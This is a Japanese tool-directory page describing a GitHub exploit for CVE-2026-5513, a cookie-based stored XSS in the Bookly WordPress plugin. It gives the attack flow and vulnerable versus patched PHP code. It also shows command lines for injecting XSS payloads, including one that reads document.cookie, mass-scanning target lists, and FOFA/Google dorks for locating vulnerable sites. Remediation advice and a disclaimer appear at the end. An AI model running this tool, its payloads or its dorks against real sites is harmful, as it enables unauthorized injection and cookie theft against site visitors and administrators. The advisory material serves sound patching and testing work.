Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/xaanziu/cve-2026-5513
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubxaanziu/cve-2026-5513

CVE-2026-5513

CVE-2026-5513: Bookly <= 27.2 Cookie 経由の Stored XSS(未認証)

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-5513 — Bookly ≤ 27.2 Cookie経由の格納型XSS

CVE CVSS Type Auth

概要

フィールド値
CVE IDCVE-2026-5513
脆弱性格納型クロスサイトスクリプティング(XSS)
プラグインBookly — オンライン予約・スケジュール管理システム
影響を受けるバージョン≤ 27.2
修正済みバージョン27.3+
CVSS 3.17.2(高) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CWECWE-79
認証要件不要
前提条件「Remember personal information in cookies」が有効であること(デフォルトでは無効)

説明

WordPress用プラグインBooklyは、バージョン27.2以前において、入力サニタイズおよび出力エスケープが不十分なため、bookly-customer-full-name Cookieを介した格納型クロスサイトスクリプティングの影響を受けます。

「Remember personal information in cookies」設定が有効な場合、プラグインは bookly-customer-full-name Cookieの値を読み取り、適切なエスケープを行わずに予約フォームのHTMLに直接出力します。認証されていない攻撃者は、このCookieを介して任意のJavaScriptペイロードを注入でき、Bookly予約フォームを含むページをすべてのユーザー(管理者を含む)が訪問するたびに実行されます。

攻撃フロー

root@kitploit:~
Attacker → Set malicious cookie (bookly-customer-full-name=<script>...</script>)
         → Visit page with Bookly booking form
         → Plugin reads cookie, renders value without escaping
         → XSS payload executes in victim's browser context

根本原因

root@kitploit:~
// VULNERABLE — Bookly ≤ 27.2
$full_name = $_COOKIE['bookly-customer-full-name'];  // No sanitization
echo '<input type="text" value="' . $full_name . '" />';  // No escaping
root@kitploit:~
// PATCHED — Bookly 27.3+
$full_name = sanitize_text_field($_COOKIE['bookly-customer-full-name']);
echo '<input type="text" value="' . esc_attr($full_name) . '" />';

特徴

root@kitploit:~
 ✓ Auto IP/Domain probing (HTTP/HTTPS, common ports, redirect detection)
 ✓ WordPress & Bookly plugin detection with version check
 ✓ Cookie setting detection (BooklyL10n JS analysis + canary reflection)
 ✓ Multi-context XSS testing (HTML, JavaScript, attribute injection)
 ✓ Payload injection with reflection verification
 ✓ Single target or mass scan from file
 ✓ Multi-threaded scanning (up to 20 threads)
 ✓ Proxy support (Burp, etc.)
 ✓ Auto-save vulnerable results
 ✓ Interactive menu + CLI modes

インストール

root@kitploit:~
pip install requests colorama

使い方

CLIモード

root@kitploit:~
# Check single target
python CVE-2026-5513.py -u https://target.com -v

# Check single IP (auto-probe ports + redirects)
python CVE-2026-5513.py -u 167.99.0.203 -v

# Check + inject XSS payload
python CVE-2026-5513.py -u https://target.com --inject -v

# Custom XSS payload
python CVE-2026-5513.py -u https://target.com --inject --payload "<svg onload=alert(document.cookie)>"

# Mass scan from file
python CVE-2026-5513.py -l targets.txt -t 20 -o vuln.txt

# With Burp proxy
python CVE-2026-5513.py -u https://target.com -v --proxy http://127.0.0.1:8080

対話モード

root@kitploit:~
python CVE-2026-5513.py

オプション

ターゲット形式

このツールは、-u またはターゲット一覧ファイルで以下のいずれかの形式を受け付けます:

root@kitploit:~
https://example.com
http://example.com
example.com
192.168.1.100
192.168.1.100:8080

ベアIPの場合、ツールは自動的に以下を実行します:

  • ポート443、80、8443、8080をプローブ
  • HTTP→HTTPSリダイレクトを検出
  • IP→ドメインリダイレクトを検出(例: 167.99.0.203 → https://book.repairrite.com)
  • WordPressサブディレクトリをスキャン(/wp/、/blog/、/wordpress/ など)

エクスプロイトチェーン

root@kitploit:~
STEP 0 → Probe target (IP/domain → resolve base URL, detect redirects)
STEP 1 → Detect Bookly plugin (readme.txt, plugin dir, assets, version check)
STEP 2 → Check cookie setting (BooklyL10n JS analysis + canary reflection test)
STEP 3 → Test XSS reflection (HTML context, JS context, attribute context)
STEP 4 → Inject payload (if --inject mode, verify reflection)

Google Dorks

root@kitploit:~
# FOFA
body="bookly-responsive-appointment-booking-tool"
body="bookly-customer-full-name"
body="bookly-form-group" && body="wp-content/plugins/bookly"

# Google
inurl:"/wp-content/plugins/bookly-responsive-appointment-booking-tool/readme.txt"
intitle:"Book Appointment" inurl:"booking" intext:"bookly"

対策

優先度対応
🔴Booklyをバージョン27.3以上に更新する
🟡Booklyの「設定 → 一般」で「Remember personal information in cookies」を無効化する
🟢Cookie値のXSSをフィルタリングするWAFルールを導入する
🟢Content-Security-Policy(CSP)ヘッダーを実装する

参照

  • NVD — CVE-2026-5513
  • Wordfence セキュリティアドバイザリ
  • Tenable
  • Bookly チェンジログ

免責事項

このツールは、許可されたセキュリティテストおよび教育目的のみで提供されます。 コンピュータシステムへの不正アクセスは違法です。テストを実施する前に必ず適切な許可を取得してください。 著者は、このツールの誤用について一切責任を負いません。

ライセンス

MIT

ツールをダウンロード
フラグ説明
-u URL単一ターゲット(URL、ドメイン、またはIP)
-l FILEターゲット一覧ファイル(1行に1ターゲット)
--injectXSSペイロードを注入(デフォルト: チェックのみ)
--payload STRカスタムXSSペイロード
-t Nスレッド数(デフォルト: 10、最大: 20)
--proxy URLHTTPプロキシ(例: http://127.0.0.1:8080)
-o FILE結果をファイルに保存
-v詳細な出力